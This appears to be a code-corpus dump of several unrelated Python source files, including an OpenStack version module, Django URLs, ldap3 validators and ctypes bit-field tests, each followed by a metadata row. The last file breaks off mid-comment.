# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pbr import version as pbr_version
# Branding strings returned by vendor_string()/product_string() below; they
# may be overridden by an optional "release" config file (see _load_config).
MONITORS_VENDOR = "OpenStack Foundation"
MONITORS_PRODUCT = "OpenStack Masakari Monitors"
MONITORS_PACKAGE = None  # OS distro package version suffix
loaded = False  # guards _load_config() so the file is parsed at most once
version_info = pbr_version.VersionInfo('masakari-monitors')
version_string = version_info.version_string
def _load_config():
    """Override the branding globals from an optional "release" config file.

    Looks up a "release" file via oslo.config and, when present, reads the
    vendor/product/package options from its [Masakarimonitors] section.
    Runs at most once per process (guarded by ``loaded``).
    """
    # Don't load in global context, since we can't assume
    # these modules are accessible when distutils uses
    # this module
    import configparser
    from oslo_config import cfg
    from oslo_log import log as logging
    global loaded, MONITORS_VENDOR, MONITORS_PRODUCT, MONITORS_PACKAGE
    if loaded:
        return
    loaded = True
    cfgfile = cfg.CONF.find_file("release")
    if cfgfile is None:
        return
    try:
        # Use a distinct local name: the original rebound ``cfg``, which
        # shadowed the oslo_config module imported above.
        parser = configparser.RawConfigParser()
        parser.read(cfgfile)
        if parser.has_option("Masakarimonitors", "vendor"):
            MONITORS_VENDOR = parser.get("Masakarimonitors", "vendor")
        if parser.has_option("Masakarimonitors", "product"):
            MONITORS_PRODUCT = parser.get("Masakarimonitors", "product")
        if parser.has_option("Masakarimonitors", "package"):
            MONITORS_PACKAGE = parser.get("Masakarimonitors", "package")
    except Exception as ex:
        LOG = logging.getLogger(__name__)
        LOG.error("Failed to load %(cfgfile)s: %(ex)s",
                  {'cfgfile': cfgfile, 'ex': ex})
def vendor_string():
    """Return the vendor name, honoring any "release" file override."""
    _load_config()
    return MONITORS_VENDOR
def product_string():
    """Return the product name, honoring any "release" file override."""
    _load_config()
    return MONITORS_PRODUCT
def package_string():
    """Return the distro package suffix, or None when not packaged."""
    _load_config()
    return MONITORS_PACKAGE
def version_string_with_package():
    """Return the version string, with the distro package suffix if set."""
    suffix = package_string()
    if suffix is None:
        return version_info.version_string()
    return "%s-%s" % (version_info.version_string(), suffix)
| masakarimonitors/version.py | 2,432 | Copyright(c) 2016 Nippon Telegraph and Telephone Corporation Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. OS distro package version suffix Don't load in global context, since we can't assume these modules are accessible when distutils uses this module | 728 | en | 0.846302 |
"""sukh_site_v1 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf.urls import url, include
# Route the Django admin UI and delegate everything else to the mysite app.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('mysite.urls')),
]
| sukh_site_v1/sukh_site_v1/urls.py | 834 | sukh_site_v1 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) | 628 | en | 0.626185 |
"""
``name_index`` builds an inverted index mapping words to sets of Unicode
characters which contain that word in their names. For example::
>>> index = name_index(32, 65)
>>> sorted(index['SIGN'])
['#', '$', '%', '+', '<', '=', '>']
>>> sorted(index['DIGIT'])
['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
>>> index['DIGIT'] & index['EIGHT']
{'8'}
"""
# tag::CHARINDEX[]
import sys
import re
import unicodedata
from typing import Dict, Set, Iterator
# Raw string avoids the invalid "\w" escape warning on modern CPython
# (DeprecationWarning, later SyntaxWarning); the compiled pattern is unchanged.
RE_WORD = re.compile(r'\w+')
# First code point past the Unicode range; default upper bound for name_index.
STOP_CODE = sys.maxunicode + 1
def tokenize(text: str) -> Iterator[str]:  # <1>
    """return iterable of uppercased words"""
    return (match.group().upper() for match in RE_WORD.finditer(text))
def name_index(start: int = 32, end: int = STOP_CODE) -> Dict[str, Set[str]]:
    """Map each word of a Unicode character name to the set of characters
    whose name contains that word, for code points in [start, end)."""
    index: Dict[str, Set[str]] = {}  # <2>
    for code in range(start, end):
        char = chr(code)
        name = unicodedata.name(char, '')  # <3>
        if not name:
            continue
        for word in tokenize(name):
            index.setdefault(word, set()).add(char)
    return index
# end::CHARINDEX[]
| 08-def-type-hints/charindex.py | 1,081 | return iterable of uppercased words
``name_index`` builds an inverted index mapping words to sets of Unicode
characters which contain that word in their names. For example::
>>> index = name_index(32, 65)
>>> sorted(index['SIGN'])
['#', '$', '%', '+', '<', '=', '>']
>>> sorted(index['DIGIT'])
['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
>>> index['DIGIT'] & index['EIGHT']
{'8'}
tag::CHARINDEX[] <1> <2> <3> end::CHARINDEX[] | 463 | en | 0.47086 |
from typing import Any, Dict, Mapping, Optional, Set
from pydantic import validator
from transformer.transformers.abstract import ExtraHashableModel, Transformer
from transformer.transformers.flatters import Flatter, FlatterConfig, Unflatter
class ReportMissingData(Exception):
    """Raised by MapKeys when mapped keys are absent from the payload and
    ``ignore_missing_data`` is disabled."""

    def __init__(self, keys: Set[str]):
        self.keys = keys
        # Fixed typo: the message used to read "f{...}" because of a stray
        # character before the placeholder.
        self.message = f"The keys {self.keys} are missing in the payload."
        # Initialise Exception so str(exc) carries the message.
        super().__init__(self.message)
class MapKeysConfig(ExtraHashableModel):
    """
    This is the configuration for the MapKeys transformer.
    In order to call this transformer pass the name "map-keys" and a mapping dict.
    """

    # Maps flattened source keys to flattened destination keys.
    mapping: Mapping[str, str]
    # Keep payload keys that do not appear in ``mapping``.
    preserve_unmapped: bool = True
    # When False, MapKeys raises ReportMissingData if a mapped key is absent.
    ignore_missing_data: bool = True
    # Separator used when flattening/unflattening nested keys.
    level_separator: str = "."
    # When True, transform returns the flat dict (plus metadata) without
    # unflattening it back into a nested structure.
    return_plain: bool = False

    @validator("mapping")
    def backwards_compatibility(cls, mapping: Mapping[str, str]):
        # Rewrite the legacy ".$[" list-index notation to the current "[".
        return {
            key.replace(".$[", "["): value.replace(".$[", "[")
            for key, value in mapping.items()
        }
class MapKeys(Transformer[MapKeysConfig]):
    """
    The MapKeys is a complete dict re-designer.
    It lets you rename the keys and also restructure the entire dict. Creating new nested data where there wasn't
    and also flattening data that was previously nested is possible, all that preserving the data from the input
    dictionary.
    """
    def __init__(self, config: MapKeysConfig) -> None:
        super().__init__(config)
        # Flatter/Unflatter share one config so the same separator is used
        # in both directions.
        self.__flatters_config = FlatterConfig(level_separator=config.level_separator)
        self.__flatter = Flatter(self.__flatters_config)
        self.__unflatter = Unflatter(self.__flatters_config)
    def transform(
        self, payload: Dict[str, Any], metadata: Optional[Dict[str, Any]] = None
    ):
        """
        The mapping is done in 4 major steps:
        1. Flattens the data.
        2. Metadata Replacers:
            Some key mapping parameters are specified in the metadata. Keys that have placeholders like
            ${metadata_key} will be substituted by values on the specified metadata key.
        3. Map Data.
            In this moment the keys of the mapping inside config match the keys of the flat payload. That is, the
            payload and self._config.mapping have matching keys. Maybe not all keys in payload are in
            self._config.mapping, in which case we choose what to do with those extra keys with the config
            self._config.preserve_unmapped. If the opposite happens, the self._config.mapping have keys not present
            in the payload, the configuration self._config.ignore_missing_data chooses what should be done.
        4. Unflattens the data.
        :return: transformed and restructured data.
        """
        flat_data = self.__flatter.transform(payload)
        translated_dict: Dict = {}
        map_keys_set = set(self._config.mapping.keys())
        # Only mapping keys actually present in the flat payload are mapped.
        for map_key in map_keys_set.intersection(flat_data.keys()):
            map_value = self._config.mapping[map_key]
            if metadata is not None:
                # Substitute "@{meta_key}" placeholders in both source and
                # destination keys.
                # NOTE(review): the intersection above is computed on the
                # UN-substituted keys, so a mapping key containing "@{...}"
                # can never match the payload here -- confirm this is the
                # intended behavior.
                for meta_key, meta_value in metadata.items():
                    map_key = map_key.replace("@{" + meta_key + "}", str(meta_value))
                    map_value = map_value.replace(
                        "@{" + meta_key + "}", str(meta_value)
                    )
            translated_dict[map_value] = flat_data[map_key]
        if not self._config.ignore_missing_data:
            missing_keys = map_keys_set - flat_data.keys()
            if missing_keys:
                raise ReportMissingData(missing_keys)
        if self._config.preserve_unmapped:
            # Carry over payload keys that were not part of the mapping.
            for unmapped_key in flat_data.keys() - self._config.mapping.keys():
                translated_dict[unmapped_key] = flat_data[unmapped_key]
        if self._config.return_plain:
            # Skip unflattening: return the flat dict and metadata as-is.
            return translated_dict, metadata
        if metadata is None:
            return self.__unflatter.transform(translated_dict)
        return self.__unflatter.transform(translated_dict, metadata)
| transformer/transformers/map_keys.py | 4,040 | The MapKeys is a complete dict re-designer.
It lets you rename the keys and also restructure the entire dict. Creating new nested data where there wasn't
and also flattening data that was previously nested is possible, all that preserving the data from the input
dictionary.
This is the configuration for the MapKeys transformer.
In order to call this transformer pass the name "map-keys" and a mapping dict.
The mapping is done in 4 major steps:
1. Flattens the data.
2. Metadata Replacers:
Some key mapping parameters are specified in the metadata. Keys that have placeholders like
${metadata_key} will be substituted by values on the specified metadata key.
3. Map Data.
In this moment the keys of the mapping inside config match the keys of the flat payload. That is, the
payload and self._config.mapping have matching keys. Maybe not all keys in payload are in
self._config.mapping, in which case we choose what to do with those extra keys with the config
self._config.preserve_unmapped. If the opposite happens, the self._config.mapping have keys not present
in the payload, the configuration self._config.ignore_missing_data chooses what should be done.
4. Unflattens the data.
:return: transformed and restructured data. | 1,261 | en | 0.850537 |
from warnings import simplefilter
simplefilter(action='ignore', category=FutureWarning)
import numpy as np
import argparse
import pandas as pd
from tqdm.auto import tqdm
from datetime import datetime
import seaborn as sns
import matplotlib.pyplot as plt
from utils.functions import compute_exact_tau, compute_exact_tau_distr
from models.toy_gmm_multid import ToyGMMMultiDLoader
# Registry mapping the --run CLI value to the corresponding model loader class.
model_dict = {
    'gmm': ToyGMMMultiDLoader
}
def main(d_obs, run, rep, alpha, sample_size_obs, n_sampled_true_tau, debug=False, seed=7, verbose=False,
         marginal=False, size_marginal=1000, size_check=10000):
    """Compute exact likelihood-ratio confidence sets for a toy simulation model.

    For each repetition, estimates the model entropy, computes the exact tau
    statistic over the parameter grid, builds the true confidence interval at
    level ``alpha``, and records coverage/size per grid point. Results are
    written to a timestamped CSV and a coverage summary is printed.

    :param d_obs: dimensionality of the observed data (feature space).
    :param run: key into ``model_dict`` selecting the model loader (e.g. 'gmm').
    :param rep: number of Monte Carlo repetitions.
    :param alpha: statistical confidence level (quantile of the tau distribution).
    :param sample_size_obs: sample size of the observed data per repetition.
    :param n_sampled_true_tau: Monte Carlo samples for the tau-statistic distribution.
    :param debug: if True, shrink ``rep`` and ``n_sampled_true_tau`` for a quick run.
    :param seed: NumPy random seed.
    :param verbose: accepted for CLI compatibility; currently unused in this function.
    :param marginal: whether the model loader should use the marginal reference.
    :param size_marginal: sample size used to build the marginal reference.
    :param size_check: sample size used for the entropy estimate.
    :return: None; results are saved under ``sims/classifier_power_multid/``.
    """
    import os  # local import: the module-level import block does not include os

    # Changing values if debugging
    rep = rep if not debug else 2
    n_sampled_true_tau = n_sampled_true_tau if not debug else 10
    model_obj = model_dict[run](d_obs=d_obs, marginal=marginal, size_marginal=size_marginal)
    # Get the correct functions
    grid_param = model_obj.grid
    gen_obs_func = model_obj.sample_sim
    gen_sample_func = model_obj.generate_sample
    or_func = model_obj.compute_exact_or
    t0_grid = model_obj.pred_grid
    tp_func = model_obj.compute_exact_prob
    t0_val = model_obj.true_param
    # Loop over repetitions and classifiers
    # Each time we train the different classifiers, we build the intervals and we record
    # whether the point is in or not.
    np.random.seed(seed)
    out_val = []
    out_cols = ['d_obs', 'run', 'rep', 'classifier', 'sample_size_obs', 't0_true_val', 'theta_0_current', 'on_true_t0',
                'in_true_interval', 'size_true_int', 'true_entropy']
    pbar = tqdm(total=rep, desc='Toy Example for Simulations, n=%s' % sample_size_obs)
    for jj in range(rep):
        # Creating sample to check entropy about
        sample_check = gen_sample_func(sample_size=size_check, marginal=False)
        theta_vec = sample_check[:, :model_obj.d]
        x_vec = sample_check[:, (model_obj.d + 1):]
        bern_vec = sample_check[:, model_obj.d]
        true_prob_vec = tp_func(theta_vec=theta_vec, x_vec=x_vec)
        entropy_est = -np.average([np.log(true_prob_vec[kk]) if el == 1
                                   else np.log(1 - true_prob_vec[kk])
                                   for kk, el in enumerate(bern_vec)])
        # TRUE CONFIDENCE INTERVAL
        # Generates samples for each t0 value, so as to be able to check both coverage and power
        x_obs = gen_obs_func(sample_size=sample_size_obs, true_param=t0_val)
        # Calculate the true LRT value over the evaluation grid
        tau_obs = np.array([compute_exact_tau(
            or_func=or_func, x_obs=x_obs, t0_val=theta_0, t1_linspace=grid_param) for theta_0 in t0_grid])
        tau_distr = np.apply_along_axis(arr=t0_grid.reshape(-1, model_obj.d), axis=1,
                                        func1d=lambda t0: compute_exact_tau_distr(
                                            gen_obs_func=gen_obs_func, or_func=or_func, t0_val=t0,
                                            t1_linspace=grid_param, n_sampled=n_sampled_true_tau,
                                            sample_size_obs=sample_size_obs, d_obs=model_obj.d_obs))
        assert tau_distr.shape == (t0_grid.shape[0], n_sampled_true_tau)
        quantile_pred_tau = np.quantile(a=tau_distr, q=alpha, axis=1)
        true_interval = (tau_obs > quantile_pred_tau).astype(int)
        true_interval_size = (np.sum(true_interval) / true_interval.shape[0])
        # At this point all that's left is to record one row per grid point
        for kk, theta_0_current in enumerate(t0_grid):
            out_val.append([
                d_obs, run, jj, 'Exact', sample_size_obs,
                t0_val, theta_0_current, int(t0_val == theta_0_current),
                true_interval[kk], true_interval_size, entropy_est
            ])
        pbar.update(1)
    pbar.close()  # fix: progress bar was never closed (leaves a dangling tqdm handle)
    # Saving the results
    out_df = pd.DataFrame.from_records(data=out_val, index=range(len(out_val)), columns=out_cols)
    out_dir = 'sims/classifier_power_multid/'
    os.makedirs(out_dir, exist_ok=True)  # fix: to_csv fails if the output directory does not exist
    out_filename = 'truth_classifier_power_multid%s_%s_%srep_alpha%s_sampleobs%s_t0val%s_%ssampletau_%s.csv' % (
        d_obs, run, rep, str(alpha).replace('.', '-'), sample_size_obs,
        str(t0_val).replace('.', '-'), n_sampled_true_tau,
        datetime.strftime(datetime.today(), '%Y-%m-%d')
    )
    out_df.to_csv(out_dir + out_filename)
    # Print results
    cov_df = out_df[out_df['on_true_t0'] == 1][['classifier', 'in_true_interval', 'true_entropy', 'size_true_int']]
    print(cov_df.groupby(['classifier']).agg({'in_true_interval': [np.average],
                                              'size_true_int': [np.average, np.std],
                                              'true_entropy': [np.average, np.std]}))
if __name__ == '__main__':
    # Command-line entry point: parse simulation settings and delegate to main().
    cli = argparse.ArgumentParser()
    cli.add_argument('--seed', action="store", type=int, default=7,
                     help='Random State')
    cli.add_argument('--d_obs', action="store", type=int, default=2,
                     help='Dimensionality of the observed data (feature space)')
    cli.add_argument('--rep', action="store", type=int, default=10,
                     help='Number of Repetitions for calculating the Pinball loss')
    cli.add_argument('--alpha', action="store", type=float, default=0.1,
                     help='Statistical confidence level')
    cli.add_argument('--run', action="store", type=str, default='gmm',
                     help='Problem to run')
    cli.add_argument('--debug', action='store_true', default=False,
                     help='If true, a very small value for the sample sizes is fit to make sure the'
                          'file can run quickly for debugging purposes')
    cli.add_argument('--verbose', action='store_true', default=False,
                     help='If true, logs are printed to the terminal')
    cli.add_argument('--sample_size_obs', action="store", type=int, default=10,
                     help='Sample size of the actual observed data.')
    cli.add_argument('--n_sampled_true_tau', action="store", type=int, default=100,
                     help='Number of Monte Carlo samples for calculating distribution of tau sample.')
    parsed = cli.parse_args()
    main(d_obs=parsed.d_obs,
         run=parsed.run,
         rep=parsed.rep,
         alpha=parsed.alpha,
         debug=parsed.debug,
         sample_size_obs=parsed.sample_size_obs,
         seed=parsed.seed,
         verbose=parsed.verbose,
         n_sampled_true_tau=parsed.n_sampled_true_tau)
| acore/classifier_power_multid_truth.py | 6,642 | Changing values if debugging Get the correct functions Loop over repetitions and classifiers Each time we train the different classifiers, we build the intervals and we record whether the point is in or not. Creating sample to check entropy about TRUE CONFIDENCE INTERVAL print('------ Calculate true Confidence Interval') Generates samples for each t0 values, so to be able to check both coverage and power Calculate the true LRT value At this point all it's left is to record Saving the results Print results | 511 | en | 0.765837 |
"""
"""
# Created on 2016.08.09
#
# Author: Giovanni Cannata
#
# Copyright 2016, 2017 Giovanni Cannata
#
# This file is part of ldap3.
#
# ldap3 is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ldap3 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with ldap3 in the COPYING and COPYING.LESSER files.
# If not, see <http://www.gnu.org/licenses/>.
from datetime import datetime
from ... import SEQUENCE_TYPES, STRING_TYPES
from .formatters import format_time
# Validators return True if value is valid, False if value is not valid,
# or a value different from True and False that is a valid value to substitute to the input value
def check_type(input_value, value_type):
    """Return True when *input_value* — or, for a sequence, every one of its
    elements — is an instance of *value_type*; False otherwise."""
    if isinstance(input_value, value_type):
        return True
    if isinstance(input_value, SEQUENCE_TYPES):
        return all(isinstance(element, value_type) for element in input_value)
    return False
def always_valid(name, input_value):
    """Validator that unconditionally accepts any value for any attribute."""
    return True
def validate_generic_single_value(name, input_value):
    """Accept any non-sequence value, or a sequence containing exactly one element."""
    if isinstance(input_value, SEQUENCE_TYPES):
        return len(input_value) == 1
    return True
def validate_integer(name, input_value):
    # Valid when the value (or every element of a sequence of values) is an int.
    return check_type(input_value, int)
def validate_bytes(name, input_value):
    # Valid when the value (or every element of a sequence of values) is bytes.
    return check_type(input_value, bytes)
def validate_boolean(name, input_value):
    """Validate an LDAP boolean: a Python bool or the strings 'true'/'false'
    (any case). Returns the canonical 'TRUE'/'FALSE' string, or False when
    the value is invalid. Only a single value is allowed."""
    if not validate_generic_single_value(name, input_value):
        return False
    value = input_value[0] if isinstance(input_value, SEQUENCE_TYPES) else input_value
    if isinstance(value, bool):
        return 'TRUE' if value else 'FALSE'
    if isinstance(value, STRING_TYPES):
        lowered = value.lower()
        if lowered == 'true':
            return 'TRUE'
        if lowered == 'false':
            return 'FALSE'
    return False
def validate_time(name, input_value):
    """Validate values for a Generalized Time attribute.

    Returns True when every value is already a valid Generalized Time string,
    False when any value is invalid, or the converted value(s) when datetime
    objects had to be turned into Generalized Time strings (a single value is
    returned if the input was not a sequence).
    """
    # if datetime object doesn't have a timezone it's considered local time and is adjusted to UTC
    changed = False
    sequence = True  # indicates if a sequence must be returned
    if not isinstance(input_value, SEQUENCE_TYPES):
        sequence = False
        input_value = [input_value]
    valid_values = []
    for element in input_value:
        if isinstance(element, STRING_TYPES):  # tries to check if it is already a Generalized Time
            if isinstance(format_time(element), datetime):  # valid Generalized Time string
                valid_values.append(element)
            else:
                return False
        elif isinstance(element, datetime):
            changed = True
            if element.tzinfo:  # a datetime with a timezone: keep its numeric offset
                # fix: the previous format '%Y%m%d%H%M%SZ%z' emitted BOTH the 'Z' UTC
                # designator and a numeric offset (e.g. '...Z+0200'), which is not a
                # valid Generalized Time per RFC 4517; emit only the offset.
                valid_values.append(element.strftime('%Y%m%d%H%M%S%z'))
            else:  # datetime without timezone, assumed local and adjusted to UTC
                offset = datetime.now() - datetime.utcnow()
                valid_values.append((element - offset).strftime('%Y%m%d%H%M%SZ'))
        else:
            return False
    if changed:
        return valid_values if sequence else valid_values[0]
    return True
| lib/python2.7/site-packages/ldap3/protocol/formatters/validators.py | 3,893 | Created on 2016.08.09 Author: Giovanni Cannata Copyright 2016, 2017 Giovanni Cannata This file is part of ldap3. ldap3 is free software: you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. ldap3 is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with ldap3 in the COPYING and COPYING.LESSER files. If not, see <http://www.gnu.org/licenses/>. Validators return True if value is valid, False if value is not valid, or a value different from True and False that is a valid value to substitute to the input value it could be a real bool or the string TRUE or FALSE, only a single valued is allowed if datetime object doesn't have a timezone it's considered local time and is adjusted to UTC indicates if a sequence must be returned tries to check if it is already be a Generalized Time valid Generalized Time string a datetime with a timezone datetime without timezone, assumed local and adjusted to UTC | 1,320 | en | 0.867289 |
import py
from ctypes import *
from support import BaseCTypesTestChecker
import os
import ctypes
# All fixed-width ctypes integer types that may legally carry bit-fields,
# split by signedness; int_types is the union used by the size tests below.
signed_int_types = (c_byte, c_short, c_int, c_long, c_longlong)
unsigned_int_types = (c_ubyte, c_ushort, c_uint, c_ulong, c_ulonglong)
int_types = unsigned_int_types + signed_int_types
def setup_module(mod):
    """Load the compiled test helper library (built by conftest) and publish
    its unpack_bitfields entry point as the module-level global ``func``."""
    import conftest
    library_path = str(conftest.sofile)
    unpack = CDLL(library_path).unpack_bitfields
    unpack.argtypes = POINTER(BITS), c_char
    mod.func = unpack
class BITS(Structure):
    # Mixed-width bit-field structure: nine c_int fields "A".."I" of widths
    # 1..9 bits, followed by seven c_short fields "M".."S" of widths 1..7 bits.
    _fields_ = (
        [(field_name, c_int, width)
         for width, field_name in enumerate("ABCDEFGHI", start=1)]
        + [(field_name, c_short, width)
           for width, field_name in enumerate("MNOPQRS", start=1)]
    )
class TestC:
    """Cross-check Python-side bit-field reads against the C helper: for each
    field and each value that fits the field, getattr must agree with what the
    C function extracts from the same structure."""
    def test_ints(self):
        for value in range(512):
            for field in "ABCDEFGHI":
                bits = BITS()
                setattr(bits, field, value)
                assert (field, value, getattr(bits, field)) == (field, value, func(byref(bits), field))

    def test_shorts(self):
        for value in range(256):
            for field in "MNOPQRS":
                bits = BITS()
                setattr(bits, field, value)
                assert (field, value, getattr(bits, field)) == (field, value, func(byref(bits), field))
class TestBitField:
    """Tests for bit-field declaration rules, storage-unit sizing and layout."""
    def test_longlong(self):
        # 1 + 62 + 1 bits fill a single signed 64-bit storage unit exactly.
        class X(Structure):
            _fields_ = [("a", c_longlong, 1),
                        ("b", c_longlong, 62),
                        ("c", c_longlong, 1)]
        assert sizeof(X) == sizeof(c_longlong)
        x = X()
        x.a, x.b, x.c = -1, 7, -1
        assert (x.a, x.b, x.c) == (-1, 7, -1)
        x = X()
        x.a, x.b, x.c = -1, -7, -1
        assert (x.a, x.b, x.c) == (-1, -7, -1)
    def test_ulonglong(self):
        # Unsigned fields truncate to the field width: 7 in a 1-bit field reads as 1.
        class X(Structure):
            _fields_ = [("a", c_ulonglong, 1),
                        ("b", c_ulonglong, 62),
                        ("c", c_ulonglong, 1)]
        assert sizeof(X) == sizeof(c_longlong)
        x = X()
        assert (x.a, x.b, x.c) == (0, 0, 0)
        x.a, x.b, x.c = 7, 2305843009213693953, 7
        assert (x.a, x.b, x.c) == (1, 2305843009213693953, 1)
    def test_signed(self):
        # Signed bit-fields sign-extend on read: -1 round-trips as -1.
        for c_typ in signed_int_types:
            class X(Structure):
                _fields_ = [("dummy", c_typ),
                            ("a", c_typ, 3),
                            ("b", c_typ, 3),
                            ("c", c_typ, 1)]
            assert sizeof(X) == sizeof(c_typ)*2
            x = X()
            assert (c_typ, x.a, x.b, x.c) == (c_typ, 0, 0, 0)
            x.a = -1
            assert (c_typ, x.a, x.b, x.c) == (c_typ, -1, 0, 0)
            x.a, x.b = 0, -1
            assert (c_typ, x.a, x.b, x.c) == (c_typ, 0, -1, 0)
    def test_unsigned(self):
        # Unsigned bit-fields wrap: -1 stored in a 3-bit field reads back as 7.
        for c_typ in unsigned_int_types:
            class X(Structure):
                _fields_ = [("a", c_typ, 3),
                            ("b", c_typ, 3),
                            ("c", c_typ, 1)]
            assert sizeof(X) == sizeof(c_typ)
            x = X()
            assert (c_typ, x.a, x.b, x.c) == (c_typ, 0, 0, 0)
            x.a = -1
            assert (c_typ, x.a, x.b, x.c) == (c_typ, 7, 0, 0)
            x.a, x.b = 0, -1
            assert (c_typ, x.a, x.b, x.c) == (c_typ, 0, 7, 0)
    def fail_fields(self, *fields):
        # Build a Structure subclass with the given _fields_ by invoking the
        # metaclass directly, returning the (exception class, message) raised.
        return self.get_except(type(Structure), "X", (),
                               {"_fields_": fields})
    def test_nonint_types(self):
        # bit fields are not allowed on non-integer types.
        result = self.fail_fields(("a", c_char_p, 1))
        assert result == (TypeError, 'bit fields not allowed for type c_char_p')
        result = self.fail_fields(("a", c_void_p, 1))
        assert result == (TypeError, 'bit fields not allowed for type c_void_p')
        if c_int != c_long:
            result = self.fail_fields(("a", POINTER(c_int), 1))
            assert result == (TypeError, 'bit fields not allowed for type LP_c_int')
        result = self.fail_fields(("a", c_char, 1))
        assert result == (TypeError, 'bit fields not allowed for type c_char')
        try:
            c_wchar
        except NameError:
            # build without wchar support — skip that case
            pass
        else:
            result = self.fail_fields(("a", c_wchar, 1))
            assert result == (TypeError, 'bit fields not allowed for type c_wchar')
        class Dummy(Structure):
            _fields_ = []
        result = self.fail_fields(("a", Dummy, 1))
        assert result == (TypeError, 'bit fields not allowed for type Dummy')
    def test_single_bitfield_size(self):
        # Valid widths are 1..sizeof(type)*8; a single field never grows the struct.
        for c_typ in int_types:
            result = self.fail_fields(("a", c_typ, -1))
            assert result == (ValueError, 'number of bits invalid for bit field')
            result = self.fail_fields(("a", c_typ, 0))
            assert result == (ValueError, 'number of bits invalid for bit field')
            class X(Structure):
                _fields_ = [("a", c_typ, 1)]
            assert sizeof(X) == sizeof(c_typ)
            class X(Structure):
                _fields_ = [("a", c_typ, sizeof(c_typ)*8)]
            assert sizeof(X) == sizeof(c_typ)
            result = self.fail_fields(("a", c_typ, sizeof(c_typ)*8 + 1))
            assert result == (ValueError, 'number of bits invalid for bit field')
    def test_multi_bitfields_size(self):
        # 1+14+1 bits of c_short pack into one short.
        class X(Structure):
            _fields_ = [("a", c_short, 1),
                        ("b", c_short, 14),
                        ("c", c_short, 1)]
        assert sizeof(X) == sizeof(c_short)
        # A plain (non-bit-field) member in between forces new storage units;
        # the offset assertions pin the expected layout.
        class X(Structure):
            _fields_ = [("a", c_short, 1),
                        ("a1", c_short),
                        ("b", c_short, 14),
                        ("c", c_short, 1)]
        assert sizeof(X) == sizeof(c_short)*3
        assert X.a.offset == 0
        assert X.a1.offset == sizeof(c_short)
        assert X.b.offset == sizeof(c_short)*2
        assert X.c.offset == sizeof(c_short)*2
        # Fields that don't fit the current 16-bit unit each open a new one.
        class X(Structure):
            _fields_ = [("a", c_short, 3),
                        ("b", c_short, 14),
                        ("c", c_short, 14)]
        assert sizeof(X) == sizeof(c_short)*3
        assert X.a.offset == sizeof(c_short)*0
        assert X.b.offset == sizeof(c_short)*1
        assert X.c.offset == sizeof(c_short)*2
    def get_except(self, func, *args, **kw):
        # Call func, swallow any exception and return (class, message);
        # the traceback is printed for debugging. Returns None on success.
        try:
            func(*args, **kw)
        except Exception as detail:
            import traceback
            traceback.print_exc()
            return detail.__class__, str(detail)
    def test_mixed_1(self):
        # Mixed c_byte/c_int allocation differs by platform: two ints on
        # Windows/CE, a single int elsewhere.
        class X(Structure):
            _fields_ = [("a", c_byte, 4),
                        ("b", c_int, 4)]
        if os.name in ("nt", "ce"):
            assert sizeof(X) == sizeof(c_int)*2
        else:
            assert sizeof(X) == sizeof(c_int)
    def test_mixed_2(self):
        # A full-width 32-bit field cannot share the unit opened by the byte field.
        class X(Structure):
            _fields_ = [("a", c_byte, 4),
                        ("b", c_int, 32)]
        assert sizeof(X) == sizeof(c_int)*2
    def test_mixed_3(self):
        # Same-width signed/unsigned byte fields share a single byte.
        class X(Structure):
            _fields_ = [("a", c_byte, 4),
                        ("b", c_ubyte, 4)]
        assert sizeof(X) == sizeof(c_byte)
    def test_anon_bitfields(self):
        # anonymous bit-fields gave a strange error message
        class X(Structure):
            _fields_ = [("a", c_byte, 4),
                        ("b", c_ubyte, 4)]
        class Y(Structure):
            _anonymous_ = ["_"]
            _fields_ = [("_", X)]
    def test_set_fields_attr(self):
        # _fields_ may be assigned after the class statement.
        class A(Structure):
            pass
        A._fields_ = [("a", c_byte),
                      ("b", c_ubyte)]
    def test_set_fields_attr_bitfields(self):
        # Late _fields_ assignment also works with a self-pointer plus a bit-field.
        class A(Structure):
            pass
        A._fields_ = [("a", POINTER(A)),
                      ("b", c_ubyte, 4)]
    def test_set_fields_cycle_fails(self):
        # A structure cannot contain itself by value.
        class A(Structure):
            pass
        import pytest
        # NOTE(review): the string argument to pytest.raises (source to be
